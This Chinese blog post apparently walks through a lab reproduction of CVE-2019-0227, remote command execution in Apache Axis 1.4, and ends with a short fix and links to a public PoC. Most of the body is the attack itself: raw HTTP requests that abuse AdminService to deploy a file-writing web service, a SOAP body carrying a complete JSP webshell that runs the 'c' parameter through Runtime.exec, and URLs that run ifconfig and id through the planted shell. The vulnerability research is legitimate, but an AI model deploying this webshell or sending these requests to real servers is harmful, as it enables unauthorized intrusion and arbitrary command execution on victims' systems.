cmd 远程安装打印机inf文件_Axis1.4 远程命令执行(CVE-2019-0227)复现

最新推荐文章于 2024-06-27 16:20:43 发布
最新推荐文章于 2024-06-27 16:20:43 发布
阅读量296 收藏
点赞数
文章标签: cmd 远程安装打印机inf文件

dd5f4a656eea4b139c65e2600d1a6216.png

1eebf1092c49487a95296848629664ea.png

一、漏洞介绍

漏洞本质是管理员对AdminService的配置错误。当enableRemoteAdmin属性设置为true时,攻击者可以构造WebService调用freemarker组件中的template.utility.Execute类,远程利用AdminService接口进行WebService发布,再次访问生成的WebService接口,传入要执行的命令,就可以进行远程命令执行漏洞的利用。

二、影响版本

Axis <=1.4

三、环境准备

方法一:

https://mirrors.tuna.tsinghua.edu.cn/apache/axis/axis/java/1.4/axis-bin-1_4.tar.gz

下载的axis-bin-1_4.tar.gz压缩包中的webapps目录下的axis目录拷贝到tomcat的webapps目录下

https://mvnrepository.com/search?q=freemarker-2.3.28.jar

下载的freemarker-2.3.28.jar放在axis/WEB-INF/lib目录下

启动tomcat后访问http://localhost:8080/axis

05405b628475644f5c249c37afab4ff8.png

这个需要WEB-INF/web.xml 去掉AdminServlet注释(这个只能本地复现)

f25d9bb8e304110a0f59177844667e93.png

如果需要远程访问复现需要开启服务访问一下,会在WEB-INF下面生成一个server-config.wsdd

a485a402f7e5c594c79e2646745b6b0e.png

需要将文件修改enableRemoteAdmin将false改为true

c84eb31d9e0841b5d51c3faa4f47e73f.png

这样允许远程admin服务

最后重启tomcat,这个很关键。

bdf8530b270d5c27817141c585e0e17e.png

方法二:

本次已经将环境打包(后台回复"axis"获取环境和POC)

下载下下来的环境包,上面要求环境都配置好了。

直接解压放在tomcat/webapps下面,启动tomcat访问http://localhost:8080/axis

e51faa4fdc298147419c1ca8d26446a5.png

四、漏洞复现

方法一、手工写入shell

通过services/AdminService 服务部署一个webservice ,webservice开启一个写文件服务。写入的文件路径是../webapps/ROOT/shell.jsp,服务模块的工作路径是bin目录,这里利用相对路径写入ROOT目录,我们默认IP+port访问的就是ROOT目录,也就是tomcat默认根目录。

f52f4e479814655e41f57dde5f0ad069.png

原始数据包

POST/axis/services/AdminServiceHTTP/1.1Host: 192.168.0.104:8080Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36SOAPAction: somethingUpgrade-Insecure-Requests: 1Content-Type: application/xmlAccept-Encoding: gzip, deflateContent-Length: 1061​<?xml version="1.0" encoding="utf-8"?>

注意写入shell位置,也可以修改比如manager,建议在ROOT下来。

调用上一步创建的恶意webservice 写入webshell

d1fe011d4f784c3f0fecc82ef9ce0c26.png

原始数据包

POST /axis/services/RandomService HTTP/1.1Host: 192.168.0.104:8080Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36Accept-Language: en-US,en;q=0.5SOAPAction: somethingUpgrade-Insecure-Requests: 1Content-Type: application/xmlAccept-Encoding: gzip, deflateContent-Length: 876​ <soapenv:Body> <api:mainsoapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <api:in0><![CDATA[<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>]]> </api:in0> </api:main> </soapenv:Body></soapenv:Envelope>

返回时500没关系,我们查看一下ROOT下面是否写入shell文件

c38e81021dfdf80a81688dd4f3e6f1c3.png

ROOT目录下shell文件,有一些Java的类异常报错,因为是log模式。

核心还是写的CMD码

1cb81802f4523fa45fb8dcdcc1536e1a.png

接下来访问一下shell

http://192.168.0.104:8080/shell.jsp

d863340c1600780a4d9e8541d204fd01.png

执行一下命令

http://192.168.0.104:8080/shell.jsp?c=ifconfig可以获取系统的信息但是看起来不怎么直观

9cccec0855fa054da7567d03aa5de87b.png

检查代码

cb0f3345d01ee7003af6bc438217e45a.png

这么清晰查看网络信息

方法二、poc脚本写入shell

python Axis1.4_rce_poc.py http://192.168.0.104:8080/axis/

执行成功

64aadce7d4476de103132a18d8f01945.png

访问shell路径:http://192.168.0.104:8080/axis/../shell.jsp

f1b2f41acc0fc63fc1e3a8de90460460.png

因为第二次写了一次,这个是在第一次的基础上追加内容。

http://192.168.0.104:8080/shell.jsp?c=id

358a206279f40080d83c381785f9a347.png

成功执行

五、漏洞修复

关闭admin服务即可,具体方法注释掉web-inf/web.xml 里的AdminServlet,然后重启tomcat.

AdminServlet/servlet/AdminServlet

参考:

https://www.secpulse.com/archives/108937.html

https://github.com/cwkiller/Axis-1.4-RCE-Poc

后台回复"axis"获取环境和POC

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

2b88ed8e8ad9934aa09bbd77e5781fe9.png

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

原文链接:

Axis1.4 远程命令执行(CVE-2019-0227)复现​mp.weixin.qq.com
55c98fa16b268d9b67e062935c650d2c.png
xml执行java源码-Axis-1.4-RCE-Poc:Axis<=1.4远程命令执行(RCE)POC
06-06
xml 执行java源码 Axis <=1.4 远程命令执行(RCE) POC 环境准备 首先下载Axis1.4 本仓库有一个打包好的axis直接解压到tomcat webapps下即可 ,web-inf/web.xml 去掉AdminServlet注释 然后,server-config.wsdd文件开启enableRemoteAdmin (本地环境可以不管) 本人部署在tomcat8上 利用 第一步: 通过services/AdminService 服务 部署一个webservice ,webservice开启一个写文件服务。这里我们要写入的文件名是../webapps/ROOT/shell.jsp,服务模块的工作路径是bin目录,这里利用相对路径写入ROOT目录,也就是tomcat默认根目录。 POST /axis/services/AdminService HTTP/1.1 Host: localhost:8080 Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*
springboot+axis1.4
05-22
2. **集成 Axis1.4**:首先,你需要在Spring Boot的`pom.xml`文件中添加Axis1.4的依赖。这通常意味着你需要手动添加Axis的库,因为Spring Boot默认并不包含对Axis的支持。你需要找到Axis1.4的Maven坐标,并在`...
(CVE-2019-0227)Axis<=1.4 远程命令执行漏洞
m0_59598029的博客
01-24 3922
[图片](https://img-一、漏洞介绍漏洞本质是管理员对AdminService的配置错误。当enableRemoteAdmin属性设置为true时,攻击者可以构造调用freemarker组件中的template.utility.Execute类,远程利用AdminService接口进行WebService发布,再次访问生成的WebService接口,传入要执行的命令,就可以进行远程命令执行漏洞的利用。
CVE-2019-0227: Remote Code Execution in Apache Axis
weixin_30693183的博客
04-10 388
原文:https://rhinosecuritylabs.com/application-security/cve-2019-0227-expired-domain-rce-apache-axis/ poc: https://github.com/RhinoSecurityLabs/CVEs/blob/master/CVE-2019-0227/CVE-2019-0227.py 转载于:h...
Apache Axis 远程代码执行(CVE-2019-0227)
酷狗直播-锦凡歆的博客
06-18 5215
 1、基本情况   Apache Axis存在一个远程代码执行漏洞,CVE编号:CVE-2019-0227。   2、攻击原理   Axis附带的默认服务StockQuoteService.jws包含一个硬编码的HTTP URL,可用于触发HTTP请求。攻击者可以通过域名(www.xmltoday.com)接管或者通过ARP欺骗服务器从而执行MITM攻击,并将HTTP请求重定向到恶意W...
利用 cmd 安装驱动 inf 文件
热门推荐
FISH 的专栏
08-22 1万+
通常情况下我们不能从 cmd安装驱动程序,但是下面的方法可以正确安装驱动程序文件xx.inf 应该和驱动程序在同一个文件夹下:C:/> rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128  C:/xxx.inf
axis1.4完整包下载
03-07
- **消费Web服务**:使用Axis1.4提供的客户端工具,可以自动生成Java客户端代理类,方便调用远程SOAP服务。 - **处理WSDL**: Axis1.4允许从WSDL生成Java服务端代码或从Java类生成WSDL,实现了服务描述的双向转换。 ...
axis-jaxrpc-1.4.jar
04-16
axis-jaxrpc-1.4.jar jaxrpc.jar webservice java工具类jar包。
Springboot集成axis1.4的demo
07-10
以下将详细讲解如何在Spring Boot应用中集成Axis1.4以及使用wsdd文件发布Web服务。 首先,了解 Axis1.4Axis 是一个开源的Java Web服务框架,它允许开发者快速地创建和部署Web服务。Axis1.4是该框架的一个较老版本...
打印机的问题
weixin_34112181的博客
05-25 250
引起打印机不打印的故障原因有很多种,有打印机方面的,也有计算机方面的。以下分别进行介绍:   1. 检查打印机是否处于联机状态。在大多数打印机上“OnLine”按钮旁边都有一个指示联机状态的灯,正常情况下该联机灯应处于常亮状态。如果该指示灯不亮或处于闪烁状态,则说明联机不正常,重点检查打印机电源是否接通、打印机电源开关是否打开、打印机电缆是否正确连接等。如...
java 远程执行linux命令_Axis1.4 远程命令执行(CVE20190227)复现
weixin_39618456的博客
11-29 195
一、漏洞介绍漏洞本质是管理员对AdminService的配置错误。当enableRemoteAdmin属性设置为true时,攻击者可以构造WebService调用freemarker组件中的template.utility.Execute类,远程利用AdminService接口进行WebService发布,再次访问生成的WebService接口,传入要执行的命令,就可以进行远程命令执行...
cmd 远程安装打印机inf文件_虚拟机安装群晖NAS
weixin_39524247的博客
11-23 443
流程概述本地电脑用cmd新建128M虚拟磁盘并写入引导文件将制作好的虚拟引导文件转换格式以供虚拟机选择虚拟机使用虚拟磁盘开机,剩下的操作同物理机安装一、制作启动分区及虚拟格式1CMD里输入以下命令,在C盘根目录下创建128M的synoboot.vhd文件diskpart create vdisk file=C:synoboot.vhd maximum=128 type=expandable at...
命令行实现inf驱动安装
linjingtu的博客
03-27 4413
管理员模式打开cmd 路径转到inf所在文件夹下 执行下述命令,“*”替换为inf文件
Apache Axis 1.4 RCE CVE-2019-0227漏洞复现
qq_43697234的博客
07-21 1万+
Apache Axis 1.4 RCE CVE-2019-0227漏洞复现 漏洞产生原因: Axis 1.4 adminservice开启远程访问,此时攻击者可通过services/AdminService 服务 部署一个webservice ,webservice开启一个写文件服务 影响范围:Axis <=1.4 且enableRemoteAdmin设置为True 环境搭建:tomcat8.5+apache Axis 1.4 将apache Axis 1.4 下的webapps/axis包放到tom
Axis搭建加漏洞RCE(含CVE-2019-0227
GalaxySpaceX的博客
05-15 3353
Axis漏洞RCE,包含CVE-2019-0227
cmd 远程安装打印机inf文件_win10环境下配置ssh连接远程服务器
weixin_39637370的博客
11-28 357
1. 前言微软已经在Win10一周年更新预览版中加入了Ubuntu Bash命令支持,相当于一个小型的linux系统,本来连接远程服务器的话,要使用putty啥的,现在可以用这个直接连接,我来讲讲步骤。当然了,powershell功能也差不多,但是尝尝鲜嘛~2.步骤2.1 开启basha.安装Bash的用户可以按照如下方法开启,先在设置→更新和安全→针对开发人员中选择“开发人员模式”,点击后会...
oracle漏洞poc,Apache Axis 1.4 远程代码执行漏洞(CVE-2019-0227)附PoC
weixin_42107165的博客
04-14 1022
漏洞编号和级别CVE编号:CVE-2019-0227,危险级别:高危,CVSS分值:官方未评定受影响的版本Apache Axis Version = 1.4不受影响版本Apache Axis2 所有版本(目前暂时没有发现Axis2的服务存在外联现象)漏洞概述Apache Axis是美国阿帕奇(Apache)软件基金会的一个开源、基于XML的Web服务架构。该产品包含了Java和C++语言实现的SO...
CVE-2019-0227漏洞分析资料
最新发布
xillianpeng的专栏
06-27 566
阿里云漏洞库https://xz.aliyun.com/t/5513Apache Axis 1.4 RCE CVE-2019-0227漏洞复现-优快云博客
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值